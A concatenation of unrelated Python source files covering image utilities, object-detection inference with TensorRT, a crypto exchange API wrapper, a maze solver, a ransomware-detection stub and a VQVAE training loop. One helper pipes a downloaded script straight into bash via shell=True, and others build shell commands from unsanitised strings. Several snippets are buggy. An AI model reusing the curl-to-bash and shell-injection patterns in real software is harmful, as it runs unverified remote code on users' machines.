imageheight: if not None, force all images to have this height (keep aspect ratio). Force sameheight to True
imagewidth: if not None, force all images to have this width (keep aspect ratio if sameheight=False and imageheight=None)
"""
images = deepcopy(img_list)
if imagetype == None:
imagetype = 'RGB'
images = [im.convert(imagetype) for im in images]
#force all image to imageheight (keep aspect ratio)
if imageheight is not None:
sameheight = True
widths, heights = zip(*(i.size for i in images))
#resize needed ?
if ( (len(set(heights)) > 1) & sameheight ) or (imageheight is not None) or (imagewidth is not None):
if imageheight is None:
imageheight = min(heights)
#force all images to same width
if imagewidth is not None:
if sameheight: #force width and height
images = [im.resize( (int(imagewidth),int(imageheight)),PIL.Image.ANTIALIAS ) for im in images]
else: #force width (keep aspect ratio)
images = [im.resize( (int(imagewidth),int(im.height*imagewidth/im.width)),PIL.Image.ANTIALIAS ) for im in images]
else: #force height (keep aspect ratio)
images = [im.resize( (int(im.width*imageheight/im.height), imageheight) ,PIL.Image.ANTIALIAS) for im in images]
widths, heights = zip(*(i.size for i in images))
total_width = sum(widths)
max_height = max(heights)
new_im = PIL.Image.new(imagetype, (total_width, max_height))
#add labels to images
if len(labels) == len(images):
fnt = ImageFont.truetype(fontfile, labelsize)
if imagetype == 'L':
fill = 240
elif imagetype == 'RGB':
fill = (176,196,222)
elif imagetype == 'RGBA':
fill = (176,196,222,0)
if labelcolor is not None:
fill = labelcolor
for i in range(len(labels)):
d = ImageDraw.Draw(images[i]).text(labelpos, labels[i], font = fnt, fill = fill)
x_offset = 0
for im in images:
new_im.paste(im, (x_offset,0))
x_offset += im.size[0]
return new_im
def display_images(im_list, labels = [], **kwargs):
display(concat_images(im_list, labels, **kwargs))
def get_filepaths(directory):
files = [os.path.join(directory, file) for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
return files
def get_filenames(directory):
files = [file for file in os.listdir(directory) if os.path.isfile(os.path.join(directory, file))]
return files
def display_folder(directory, limit = 10, **kwargs):
files = get_filepaths(directory)
files.sort()
if len(files) > limit:
files = files[:limit]
display_images([PIL.Image.open(f) for f in files], [os.path.split(f)[1] for f in files], **kwargs)
def compare_folders(dirs, labels = [], **kwargs):
if type(dirs) is list:
#dirs is a list of folders containings processed images to compare
dirlist = dirs
elif type(dirs) is str:
#dirs if parent folder of subfolders containings processed images to compare
dirlist = glob(os.path.join(dirs,'*'))
dirlist = [d for d in dirlist if os.path.isdir(d)]
first_dir = dirlist[0]
names = get_filenames(first_dir)
names.sort()
for n in names:
paths = [glob(os.path.join(d,osp.splitext(n)[0]+'*'))[0] for d in dirlist]
display_images([PIL.Image.open(p) for p in paths], [os.path.split(d)[1] for d in dirlist], **kwargs)
def clone_git(url, dir_name = None, tag = None, reclone = False):
"""
url: url of the git repository to clone
dir_name: name of the folder to give to the repository. If not given, the git repository name is used
tag: allows to checkout a specific commit if given
reclone: overwrite existing repo
"""
old_dir = os.getcwd()
if dir_name is None:
dir_name = os.path.split(url)[1] #use git repo name
dir_name = os.path.splitext(dir_name)[0] #remove ".git" if present
if reclone and os.path.exists(dir_name):
shutil.rmtree(dir_name)
if not os.path.exists(dir_name):
command = "git clone %s %s" % (url, dir_name)
subprocess.run(command, shell = True)
os.chdir(dir_name)
if tag is not None:
command = "git checkout %s" % tag
subprocess.run(command, shell = True)
git_path = os.path.join(os.getcwd())
os.chdir(old_dir)
return git_path
def download_gdrive(file_id):
subprocess.run("wget https://raw.githubusercontent.com/GitHub30/gdrive.sh/master/gdrive.sh", shell = True)
subprocess.run("curl gdrive.sh | bash -s %s" % file_id, shell = True)
subprocess.run("rm gdrive.sh", shell = True)
def image_average(imlist, weights):
assert len(imlist)==len(weights), "Input lists should have same size."
weights = np.array(weights)
weights = weights/np.sum(weights)
# Assuming all images are the same size, get dimensions of first image
w,h=Image.open(imlist[0]).convert("RGB").size
N=len(imlist)
# Create a numpy array of floats to store the average (assume RGB images)
arr=np.zeros((h,w,3),np.float)
# Build up average pixel intensities, casting each image as an array of floats
for im in imlist:
imarr=np.array(Image.open(im),dtype=np.float)
arr=arr+imarr/N
# Round values in array and cast as 8-bit integer
arr=np.array(np.round(arr),dtype=np.uint8)
# Generate, save and preview final image
out=Image.fromarray(arr,mode="RGB")
return out
| 13,697 | 5,675 |
#coding=utf-8
#测试os.walk()递归遍历所有的子目录和子文件
import os
all_files = []
path = os.getcwd()
list_files = os.walk(path)
for dirpath,dirnames,filenames in list_files:
for dir in dirnames:
all_files.append(os.path.join(dirpath,dir))
for file in filenames:
all_files.append(os.path.join(dirpath,file))
#打印所有的子目录和子文件
for file in all_files:
print(file) | 371 | 172 |
# --------------------------------------------------------
# Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Xinlei Chen
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from model.config import cfg
from model.bbox_transform import bbox_transform_inv, clip_boxes
from model.nms_wrapper import nms
def proposal_layer(rpn_cls_prob, rpn_bbox_pred, im_info, cfg_key, _feat_stride,
anchors):
"""A simplified version compared to fast/er RCNN
For details please see the technical report
"""
if type(cfg_key) == bytes:
cfg_key = cfg_key.decode('utf-8')
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
# Get the scores and bounding boxes
scores = rpn_cls_prob[:, :, :, cfg.NBR_ANCHORS:]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
scores = scores.reshape((-1, 1))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Pick the top region proposals
order = scores.ravel().argsort()[::-1]
if pre_nms_topN > 0:
order = order[:pre_nms_topN]
proposals = proposals[order, :]
scores = scores[order]
# Non-maximal suppression
keep = nms(np.hstack((proposals, scores)), nms_thresh)
# Pick th top region proposals after NMS
if post_nms_topN > 0:
keep = keep[:post_nms_topN]
proposals = proposals[keep, :]
scores = scores[keep]
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
blob = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return blob, scores
def proposal_layer_all(rpn_bbox_pred, im_info, anchors):
"""
Simply returns every single RoI; GRP-HAI later decides
which are forwarded to the class-specific module.
"""
# Get the bounding boxes
batch_sz, height, width = rpn_bbox_pred.shape[0: 3]
rpn_bbox_pred = rpn_bbox_pred.reshape((-1, 4))
proposals = bbox_transform_inv(anchors, rpn_bbox_pred)
proposals = clip_boxes(proposals, im_info[:2])
# Create initial (all-zeros) observation RoI volume
roi_obs_vol = np.zeros((batch_sz, height, width, cfg.NBR_ANCHORS),
dtype=np.int32)
not_keep_ids = np.zeros((1, 1), dtype=np.int32)
# Only support single image as input
batch_inds = np.zeros((proposals.shape[0], 1), dtype=np.float32)
rois_all = np.hstack((batch_inds, proposals.astype(np.float32, copy=False)))
return rois_all, roi_obs_vol, not_keep_ids | 2,801 | 1,020 |
from __future__ import print_function
import os
import time
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
import pycuda.autoinit
import cv2
import mmcv
from tqdm import tqdm
import pickle as pkl
from vis_util import show_corners
from tools.model_zoo import model_zoo as zoo
TRT_LOGGER = trt.Logger()
# Simple helper data class that's a little nicer to use than a 2-tuple.
class HostDeviceMem(object):
def __init__(self, host_mem, device_mem):
self.host = host_mem
self.device = device_mem
def __str__(self):
return "Host:\n" + str(self.host) + "\nDevice:\n" + str(self.device)
def __repr__(self):
return self.__str__()
# Allocates all buffers required for an engine, i.e. host/device inputs/outputs.
def allocate_buffers(engine):
inputs = []
outputs = []
output_names = []
bindings = []
stream = cuda.Stream()
for binding in engine:
size = trt.volume(
engine.get_binding_shape(binding)) * engine.max_batch_size
dtype = trt.nptype(engine.get_binding_dtype(binding))
print('binding:{}, size:{}, dtype:{}'.format(binding, size, dtype))
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
output_names.append(binding)
return inputs, outputs, output_names, bindings, stream
# This function is generalized for multiple inputs/outputs.
# inputs and outputs are expected to be lists of HostDeviceMem objects.
def do_inference(context, bindings, inputs, outputs, stream, batch_size=1):
# Transfer input data to the GPU.
[cuda.memcpy_htod_async(inp.device, inp.host, stream) for inp in inputs]
# Run inference.
context.execute_async(
batch_size=batch_size, bindings=bindings, stream_handle=stream.handle)
# Transfer predictions back from the GPU.
[cuda.memcpy_dtoh_async(out.host, out.device, stream) for out in outputs]
# Synchronize the stream
stream.synchronize()
# Return only the host outputs.
return [out.host for out in outputs]
def get_engine(onnx_file_path, engine_file_path=""):
"""Attempts to load a serialized engine if available, otherwise builds a new TensorRT engine and saves it."""
def build_engine(builder):
"""Takes an ONNX file and creates a TensorRT engine to run inference with"""
with builder.create_network() as network, trt.OnnxParser(
network, TRT_LOGGER) as parser:
builder.max_workspace_size = 1 << 27 # 1GB
builder.max_batch_size = 1
print('max workspace size: {:.2f} MB'.format(
builder.max_workspace_size / 1024 / 1024))
tic = time.time()
# Parse model file
if not os.path.exists(onnx_file_path):
print('ONNX file {} not found, please generate it.'.format(
onnx_file_path))
exit(0)
print('Loading ONNX file from path {}...'.format(onnx_file_path))
with open(onnx_file_path, 'rb') as model:
print('Beginning ONNX file parsing')
parser.parse(model.read())
print('Completed parsing of ONNX file')
print('Building an engine from file {}; this may take a while...'.
format(onnx_file_path))
engine = builder.build_cuda_engine(network)
if engine is None:
raise Exception('build engine failed')
else:
print('Completed! time cost: {:.1f}s'.format(time.time() -
tic))
with open(engine_file_path, "wb") as f:
f.write(engine.serialize())
return engine
with trt.Builder(TRT_LOGGER) as builder:
if builder.platform_has_fast_fp16:
print('enable fp16 mode!')
builder.fp16_mode = True
builder.strict_type_constraints = True
engine_file_path = engine_file_path.replace('.trt', '_fp16.trt')
if os.path.exists(engine_file_path):
# If a serialized engine exists, use it instead of building an engine.
print("Reading engine from file {}".format(engine_file_path))
with open(engine_file_path,
"rb") as f, trt.Runtime(TRT_LOGGER) as runtime:
return runtime.deserialize_cuda_engine(f.read())
else:
return build_engine(builder)
def preprocess(image, use_rgb=True):
image = image.astype(np.float32)
mean_rgb = np.array([123.675, 116.28, 103.53])
std_rgb = np.array([58.395, 57.12, 57.375])
if use_rgb:
image = image[..., [2, 1, 0]]
image -= mean_rgb
image /= std_rgb
else:
mean_bgr = mean_rgb[[2, 1, 0]]
std_bgr = std_rgb[[2, 1, 0]]
image -= mean_bgr
image /= std_bgr
image = np.transpose(image, [2, 0, 1])
return np.ascontiguousarray(image)
def postprocess_2d(wh_feats, reg_offsets, heatmaps, heatmap_indexs, rf):
score_thresh = 0.01
h, w = heatmaps.shape[-2:]
batch, topk = heatmap_indexs.shape
heatmaps = heatmaps.reshape((batch, -1))
scores = np.take(heatmaps, heatmap_indexs)
labels = (heatmap_indexs // (h * w)).astype(int)
spatial_idx = heatmap_indexs % (h * w)
offsetx = np.take(reg_offsets[:, 0, ...].reshape((batch, -1)), spatial_idx)
offsety = np.take(reg_offsets[:, 1, ...].reshape((batch, -1)), spatial_idx)
pred_w = np.take(wh_feats[:, 0, ...].reshape((batch, -1)), spatial_idx)
pred_h = np.take(wh_feats[:, 1, ...].reshape((batch, -1)), spatial_idx)
cx = spatial_idx % w + offsetx
cy = spatial_idx // w + offsety
x1 = cx - pred_w / 2
y1 = cy - pred_h / 2
x2 = cx + pred_w / 2
y2 = cy + pred_h / 2
bboxes = np.stack([x1, y1, x2, y2], axis=2) * pool_scale
return bboxes, labels, scores
def show_results_2d(img, outputs, output_image_path, class_names):
# Run the post-processing algorithms on the TensorRT outputs and get the bounding box details of detected objects
bboxes, labels, scores = postprocess_2d(*outputs)
scores = scores[..., np.newaxis]
bboxes = np.concatenate((bboxes, scores), axis=2)
mmcv.imshow_det_bboxes(
img,
bboxes[0],
labels[0],
class_names=class_names,
score_thr=0.35,
show=output_image_path is None,
out_file=output_image_path)
# Draw the bounding boxes onto the original input image and save it as a PNG file
# obj_detected_img = draw_bboxes(resized_image, boxes[0], scores[0], classes[0])
#
# cv2.imwrite(output_image_path, obj_detected_img)
# print('Saved image with bounding boxes of detected objects to {}.'.format(
# output_image_path))
def postprocess_3d(heatmaps, height_feats, reg_xoffsets, reg_yoffsets, poses,
heatmap_indexs):
batch, _, h, w = heatmaps.shape
results = []
for i in range(batch):
idxs = heatmap_indexs[i]
scores = heatmaps[i].reshape(-1)[idxs]
labels = (idxs // (h * w)).astype(int)
idxs = idxs % (h * w)
x_idxs = idxs % w
y_idxs = idxs // w
offsetx = reg_xoffsets[i, :, y_idxs, x_idxs]
offsety = reg_yoffsets[i, :, y_idxs, x_idxs]
height = height_feats[i, :, y_idxs, x_idxs]
poses = poses[i, y_idxs, x_idxs]
cx = x_idxs[:, np.newaxis] + offsetx
cy = y_idxs[:, np.newaxis] + offsety
cy1 = cy - height / 2
cy2 = cy + height / 2
corners = np.stack([np.hstack([cx, cx]), np.hstack([cy1, cy2])])
corners = np.transpose(corners, [1, 2, 0]) * pool_scale
pose_scores = np.zeros_like(poses)
results.append([corners, labels, scores, poses, pose_scores])
return results
def show_results_3d(img, outputs, output_image_path, class_names):
height_feats, reg_xoffsets, reg_yoffsets, poses, heatmaps, heatmap_indexs, _ = outputs
results = postprocess_3d(heatmaps, height_feats, reg_xoffsets,
reg_yoffsets, poses, heatmap_indexs)
score_thresh = 0.35
with open('/private/ningqingqun/undistort.pkl', 'wb') as f:
pkl.dump(results[0][0][0], f)
show_corners(
img,
results[0],
class_names,
score_thr=score_thresh,
out_file=output_image_path,
pad=0)
def get_images2():
im_list = [
'/private/ningqingqun/datasets/undist_img.png'
# '/private/ningqingqun/datasets/outsource/201910110946_00000187_1570758388348.jpg'
]
return im_list
def get_images():
# input_image_path = '/private/ningqingqun/bags/truck1_2019_07_24_14_54_43_26.msg/front_right/201907241454/201907241454_00000000_1563951283641.jpg'
# input_image_path = '/private/ningqingqun/bags/truck2_2019_07_26_17_02_47_1.msg/front_right/201907261702/201907261702_00000002_1564131768223.jpg'
# input_image_path = '/private/ningqingqun/bags/truck1_2019_09_06_13_48_14_19.msg/front_right/201909061348/201909061348_00000005_1567748895027.jpg'
# data_dir = '/private/ningqingqun/bags/crane/howo1_2019_12_04_09_14_54_0.msg/front_left/201912040915'
# data_dir = '/private/ningqingqun/bags/howo1_2019_12_11_08_59_10_6.msg/head_right/201912110859'
# data_dir = '/private/ningqingqun/bags/jinlv4_2019_10_18_09_18_50_6.msg/head_right/201910180919'
data_dir = '/private/ningqingqun/bags/howo1_2019_12_24_17_49_48_2.msg/front_left/201912241750'
# data_dir = '//private/ningqingqun/datasets/outsource/mine/truck2/front_right/20191220'
im_list = [
os.path.join(data_dir, f) for f in os.listdir(data_dir)
if f.endswith('.jpg')
]
return im_list
# Output shapes expected by the post-processor
version = 'v5.5.2'
if 'cm' in version:
num_fg = 12
else:
num_fg = 7
topk = 50
input_h, input_w = (800, 1280)
out_channels = 64
pool_scale = 4
output_h = int(input_h / pool_scale)
output_w = int(input_w / pool_scale)
onnx_files = {
'v4_fp16':
'/private/ningqingqun/torch/centernet/r34_fp16_epoch_16_iter_60000.onnx',
'v5.1.16':
'/private/ningqingqun/mmdet/outputs/v5.1.16/centernet_r18_ignore_1017_1915_gpu12/epoch_35_iter_3675.onnx',
'v5.tmp':
'work_dirs/debug/centernet_r18_ignore_1105_1118_desktop/epoch_1_iter_500.onnx',
'cm-v0.1':
'work_dirs/debug/centernet_r18_no_1119_1954_desktop/epoch_35_iter_4305.onnx',
'cm-v0.2':
'work_dirs/debug/centernet_r18_no_1120_1157_desktop/epoch_40_iter_4920.onnx',
'cm-v0.6':
'/private/ningqingqun/mmdet/outputs/no31_36/centernet_r18_adam_no_crop_1129_1920_gpu9/epoch_10_iter_2000.onnx',
'cm-v0.8':
'/work/work_dirs/v5.3.3/centernet_r18_finetune_large_1207_1707_desktop/epoch_20_iter_1160.onnx'
}
name2shape = {
'heatmap': (1, num_fg, output_h, output_w),
'height_feats': (1, 3, output_h, output_w),
'reg_xoffset': (1, 3, output_h, output_w),
'reg_yoffset': (1, 3, output_h, output_w),
'pose': (1, output_h, output_w),
'raw_features': (1, output_h, output_w, out_channels),
'heatmap_indexs': (1, topk),
'wh_feats': (1, 2, output_h, output_w),
'reg_offset': (1, 2, output_h, output_w),
}
def main():
"""Create a TensorRT engine for ONNX-based centernet and run inference."""
try:
cuda.init()
major, minor = cuda.Device(0).compute_capability()
except:
raise Exception("failed to get gpu compute capability")
onnx_file_path = zoo[version]['model_file'].replace('.pth', '.onnx')
new_ext = '-{}.{}.trt'.format(major, minor)
engine_file_path = onnx_file_path.replace('.onnx', new_ext)
# engine_file_path ='/private/ningqingqun/torch/centernet/vision_detector_fabu_v4.0.0-5.1.5.0-6.1.trt'
# Download a dog image and save it to the following file path:
image_list = get_images()
out_dir = '/private/ningqingqun/results/trt_results/' + version + '_20191220_mining'
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
# Do inference with TensorRT
trt_outputs = []
with get_engine(onnx_file_path, engine_file_path
) as engine, engine.create_execution_context() as context:
inputs, outputs, output_names, bindings, stream = allocate_buffers(
engine)
# Do inference
# print('Running inference on image {}...'.format(input_image_path))
# Set host input to the image.
# The common.do_inference function will copy the input to the GPU
# before executing.
for input_image_path in tqdm(image_list):
# input_h, input_w = (input_h // 32 * 32, input_w // 32 * 32)
im = cv2.imread(input_image_path)
resized_image = cv2.resize(im, (input_w, input_h))
input_image = preprocess(resized_image)
inputs[0].host = input_image
# tic = time.time()
trt_outputs = do_inference(
context,
bindings=bindings,
inputs=inputs,
outputs=outputs,
stream=stream)
# print('inference time cost: {:.1f}ms'.format(
# (time.time() - tic) * 1000))
# Before doing post-processing, we need to reshape the outputs as the common.do_inference will give us flat arrays.
trt_outputs = [
output.reshape(name2shape[name])
for output, name in zip(trt_outputs, output_names)
]
class_names = [
'car', 'bus', 'truck', 'person', 'bicycle', 'tricycle', 'block'
]
out_file = os.path.join(out_dir,
os.path.basename(input_image_path))
if 'v5' in version:
show_results_3d(resized_image.copy(), trt_outputs, out_file,
class_names)
elif 'cm' in version:
class_names = [
'right20',
'right40',
'right45',
'left20',
'left40',
'left45',
'NO31',
'NO32',
'NO33',
'NO34',
'NO35',
'NO36',
]
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
else:
show_results_2d(resized_image.copy(), trt_outputs, out_file,
class_names)
if __name__ == '__main__':
main()
| 14,999 | 5,562 |
import os, time, sys, hashlib
# Python Recreation of MonitorSauraus Rex.
# Originally Developed by Luke Barlow, Dayan Patel, Rob Shire, Sian Skiggs.
# Aims:
# - Detect Rapid File Changes
# - Cut Wifi Connections
# - Create Logs for running processes at time of trigger, find source infection file.
# - Create "Nest" Safe folder , with encryption and new file types. ".egg" type?
# - Create Notification for a user/admin? Connect to a database?
# - kill running processes in aim to kill attack.
# Getting MD5 Hash of a string:
# print (hashlib.md5("Your String".encode('utf-8')).hexdigest())
origHashList = []
# Getting MD5 Hash of a file:
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
# Shows Correct Hash Changes Upon File Alteration.
def getOrigMd5():
fileMd5 = md5("/home/barlowl3/test/test.txt")
origHashList.append(fileMd5)
time.sleep(3) # For Testing
fileMd5 = md5("/home/barlowl3/test/test.txt")
origHashList.append(fileMd5)
updateOrigHashText(origHashList)
# Prints The Collected Hashes.
def updateOrigHashText(origList):
ohl = open("/home/barlowl3/test/test.txt", "a")
for hash in origList:
ohl.write(hash)
ohl.write('\n')
ohl.close
# Main Method
def main():
getOrigMd5()
main()
#Use checksumdir python package available for calculating checksum/hash of directory. It's available at https://pypi.python.org/pypi/checksumdir/1.0.5
#Usage :
#import checksumdir
#hash = checksumdir.dirhash("c:\\temp")
#print hash
| 1,741 | 640 |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from .data_source import DataSchema, DataSchemaConfig, DataSource
from .tsv import TSVDataSource
__all__ = ["DataSchema", "DataSchemaConfig", "DataSource", "TSVDataSource"]
| 270 | 80 |
import math
class Solution(object):
def bfs(self, maze, i, j, fx, fy, m, n):
if i == fx and j == fy:
return 0
path = 0
bfsqueue = []
bfsvisit = [[0 for j in range(n)] for i in range(m)]
bfscost = [[math.inf for j in range(n)] for i in range(m)]
bfsvisit[i][j] = 2
bfscost[i][j] = 0
bfsqueue.append((i, j))
nextb = []
while len(bfsqueue) != 0:
(i, j) = bfsqueue.pop(0)
nexti, nextj = i + 1, j
if nexti >= 0 and nexti < m and nextj >= 0 and nextj < n and maze[nexti][nextj] != '#':
if bfsvisit[nexti][nextj] == 0:
bfsqueue.append((nexti, nextj))
bfsvisit[nexti][nextj] = 2
bfscost[nexti][nextj] = bfscost[i][j] + 1
nexti, nextj = i , j + 1
if nexti >= 0 and nexti < m and nextj >= 0 and nextj < n and maze[nexti][nextj] != '#':
if bfsvisit[nexti][nextj] == 0:
bfsqueue.append((nexti, nextj))
bfsvisit[nexti][nextj] = 2
bfscost[nexti][nextj] = bfscost[i][j] + 1
nexti, nextj = i - 1, j
if nexti >= 0 and nexti < m and nextj >= 0 and nextj < n and maze[nexti][nextj] != '#':
if bfsvisit[nexti][nextj] == 0:
bfsqueue.append((nexti, nextj))
bfsvisit[nexti][nextj] = 2
bfscost[nexti][nextj] = bfscost[i][j] + 1
nexti, nextj = i, j - 1
if nexti >= 0 and nexti < m and nextj >= 0 and nextj < n and maze[nexti][nextj] != '#':
if bfsvisit[nexti][nextj] == 0:
bfsqueue.append((nexti, nextj))
bfsvisit[nexti][nextj] = 2
bfscost[nexti][nextj] = bfscost[i][j] + 1
path += 1
bfsvisit[i][j] = 1
return bfscost
def minStep(self, maze, sx, sy, fx, fy, m, n):
return self.bfs(maze, sx, sy, fx, fy, m, n)
def minimalSteps(self, maze):
m = len(maze)
n = len(maze[0])
s_index_x = -1
s_index_y = -1
o_index_x = -1
o_index_y = -1
t_index_x = -1
t_index_y = -1
Mcount = 0
Ocount = 0
cost = 0
Mlist = []
Olist = []
StoOcost = []
OtoMcost = []
MtoTcost = []
for i in range(m):
for j in range(n):
if maze[i][j] == 'S':
s_index_x = i
s_index_y = j
if maze[i][j] == 'O':
Ocount += 1
Olist.append((i, j))
if maze[i][j] == 'T':
t_index_x = i
t_index_y = j
if maze[i][j] == 'M':
Mcount += 1
Mlist.append((i, j))
if s_index_x == -1 or t_index_x == -1:
return -1
if Mcount == 0:
dis = self.minStep(maze, s_index_x, s_index_y, t_index_x, t_index_y, m, n)[t_index_x][t_index_y]
if dis == math.inf:
return -1
return dis
StoOcost = self.minStep(maze, s_index_x, s_index_y, o_index_x, o_index_y, m, n)
cost = 0
mcost = math.inf
for oindex in Olist:
o_index_x, o_index_y = oindex
stoocost = StoOcost[o_index_x][o_index_y]
if stoocost == math.inf:
continue
OtoMcost.clear()
MtoTcost.clear()
for index in Mlist:
m_index_x, m_index_y = index
otomcost = self.minStep(maze, o_index_x, o_index_y, m_index_x, m_index_y, m, n)
mtotcost = self.minStep(maze, t_index_x, t_index_y, m_index_x, m_index_y, m, n)
OtoMcost.append(otomcost[m_index_x][m_index_y])
MtoTcost.append(mtotcost[m_index_x][m_index_y])
OtoMcostTwoSum = sum(OtoMcost) * 2
for i in range(Mcount):
mcost = min(mcost, stoocost + OtoMcostTwoSum - OtoMcost[i] + MtoTcost[i])
if mcost == math.inf:
return -1
return mcost
if __name__ == "__main__":
solution = Solution()
print(solution.minimalSteps(["S#O", "M..", "M.T"]))
print(solution.minimalSteps(["S#O", "M.#", "M.T"]))
print(solution.minimalSteps(["S#O", "M.T", "M.."]))
| 4,444 | 1,673 |
import requests
import json
from datetime import date, datetime, timedelta
class Coinext:
def __init__(self, ativo):
self.ativo = ativo
self.urlCoinext = 'https://api.coinext.com.br:8443/AP/'
def service_url(service_name):
return 'https://api.coinext.com.br:8443/AP/%s' % service_name
def call_get(self, service_name):
res = requests.get(self.service_url(service_name))
return json.loads(res.content)
def call_post(self, service_name, payload):
res = requests.post(self.service_url(service_name), data=json.dumps(payload))
return json.loads(res.content)
def obterBooks(self):
payload = {
'OMSId': 1,
'AccountId': 1,
'InstrumentId': 1,
'Depth': 1
}
return self.call_post('GetL2Snapshot', payload)
#return self.executarRequestCoinext('GET', payload, 'GetL2Snapshot')
def obterSaldo(self):
return self.executarRequestBrasilBTC('GET', '','/api/get_balance')
def obterOrdemPorId(self, idOrdem):
return self.executarRequestBrasilBTC('GET', '', 'api/check_order/{}'.format(idOrdem))
def enviarOrdemCompra(self, quantity, tipoOrdem, precoCompra):
# objeto que será postado para o endpoint
payload = {
'coin_pair': 'BRL{}'.format(self.ativo),
'order_type': tipoOrdem,
'type': 'buy',
'amount': quantity,
'price': precoCompra
}
# sem serializar o payload (json.dumps), irá retornar erro de moeda não encontrada
retorno = self.executarRequestBrasilBTC('POST', json.dumps(payload), 'api/create_order')
return retorno
def enviarOrdemVenda(self, quantity, tipoOrdem, precoVenda):
# objeto que será postado para o endpoint
payload = {
'coin_pair': 'BRL{}'.format(self.ativo),
'order_type': tipoOrdem,
'type': 'sell',
'amount': quantity,
'price': precoVenda
}
# sem serializar o payload (json.dumps), irá retornar erro de moeda não encontrada
retorno = self.executarRequestBrasilBTC('POST', json.dumps(payload), 'api/create_order')
return retorno
def TransferirCrypto(self, quantity):
config = Util.obterCredenciais()
# objeto que será postado para o endpoint
payload = {
'coin': self.ativo,
'amount': quantity,
'address': config["MercadoBitcoin"]["Address"],
'priority': 'medium'
}
# sem serializar o payload (json.dumps), irá retornar erro de moeda não encontrada
return self.executarRequestBrasilBTC('POST', json.dumps(payload), '/api/send')
def cancelarOrdem(self, idOrdem):
return self.executarRequestBrasilBTC('GET', '', 'api/remove_order/{}'.format(idOrdem))
def obterOrdensAbertas(self):
return self.executarRequestBrasilBTC('GET', '','/api/my_orders')
def obterDadosUsuario(self):
return self.executarRequestCoinext('POST', '', 'GetUserInfo')
def obterToken(self):
config = Util.obterCredenciais()
res = requests.get(self.urlCoinext+'authenticate', auth=(config['Coinext']['Login'], config['Coinext']['Password']))
auth = json.loads(res.text.encode('utf8'))
if auth['Authenticated']:
return auth['Token']
def executarRequestCoinext(self, requestMethod, payload, endpoint):
headers ={
'aptoken': self.obterToken(),
'Content-type': 'application/json'
}
# requisição básica com módulo requests
res = requests.request(requestMethod, self.urlCoinext+endpoint, headers=headers, data=payload)
return json.loads(res.text.encode('utf8')) | 3,836 | 1,208 |
from raspi_io import SoftSPI, GPIO
import raspi_io.utility as utility
if __name__ == "__main__":
address = utility.scan_server(0.05)[0]
cpld = SoftSPI(address, GPIO.BCM, cs=7, clk=11, mosi=10, miso=9, bits_per_word=10)
flash = SoftSPI(address, GPIO.BCM, cs=8, clk=11, mosi=10, miso=9, bits_per_word=8)
cpld.write([0x0])
cpld.write([0x10])
cpld.write([0x30])
cpld.write([0x80])
data = flash.xfer([0x9f], 3)
flash.print_binary(data)
| 469 | 227 |
class Solution:
def checkValidString(self, s):
"""
:type s: str
:rtype: bool
"""
cmin = cmax = 0
for ch in s:
cmax = cmax - 1 if ch == ')' else cmax + 1
cmin = cmin + 1 if ch == '(' else max(cmin - 1, 0)
if cmax < 0: return False
return cmin == 0 | 342 | 119 |
from torch import nn, optim
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
import torch
def get_optimizer(model, lr):
return optim.Adam(model.parameters(), lr=lr)
def _to_one_hot(y, num_classes):
scatter_dim = len(y.size())
y_tensor = y.view(*y.size(), -1)
zeros = torch.zeros(*y.size(), num_classes, dtype=y.dtype)
return zeros.scatter(scatter_dim, y_tensor, 1).permute(0, 3, 2, 1)
def one_hot_to_int(y):
y_trans = y.permute(0, 2, 3, 1)
y_trans = y_trans.argmax(dim=-1)
return y_trans
def train(model, input_channel, loader, callback, epoch_num, device, lr, run_num, ):
image_samples = 10
writer_path = 'vqvae_videomnist_1_00099_lstm'
optimizer = get_optimizer(model, lr)
model = model.to(device)
model = nn.DataParallel(model)
criterion = nn.MSELoss()
writer = SummaryWriter(log_dir='logs/{}_{}'.format(*[writer_path, run_num]))
for epoch in range(epoch_num):
loader = tqdm(loader)
mse_sum = 0
mse_n = 0
for iter, (frames, video_inds, frame_inds) in enumerate(loader):
model.zero_grad()
for i in range(frames.shape[1] - 1):
input_ = _to_one_hot(frames[:, i, :, :], input_channel).float()
output = _to_one_hot(frames[:, i + 1, :, :], input_channel).float()
input_ = input_.to(device)
output = output.to(device)
cell_states = model(input_)
pred , cell_state = cell_states[-1]
loss = criterion(pred, output)
loss.backward()
optimizer.step()
mse_sum += loss.item() * input_.shape[0]
mse_n += input_.shape[0]
lr = optimizer.param_groups[0]['lr']
if iter % 200 is 0:
loader.set_description(
(
'iter: {iter + 1}; mse: {loss.item():.5f}; '
f'avg mse: {mse_sum / mse_n:.5f}; '
f'lr: {lr:.5f}'
)
)
if iter is 0 and epoch > 0:
writer.add_scalar('Loss/train', mse_sum / mse_n, epoch_num)
sample = pred[:image_samples, :, :, :]
sample = one_hot_to_int(sample)
callback(sample, video_inds[i], epoch)
torch.save(model.state_dict(),
'../video/checkpoints/videomnist/vqvae-lstm/{}/{}.pt'.format(*[run_num, str(epoch).zfill(5)]))
| 2,527 | 890 |
"""
Zip - Unindo iteráveis
Zip_longest _ Itertools
"""
from itertools import zip_longest, count
index = count()
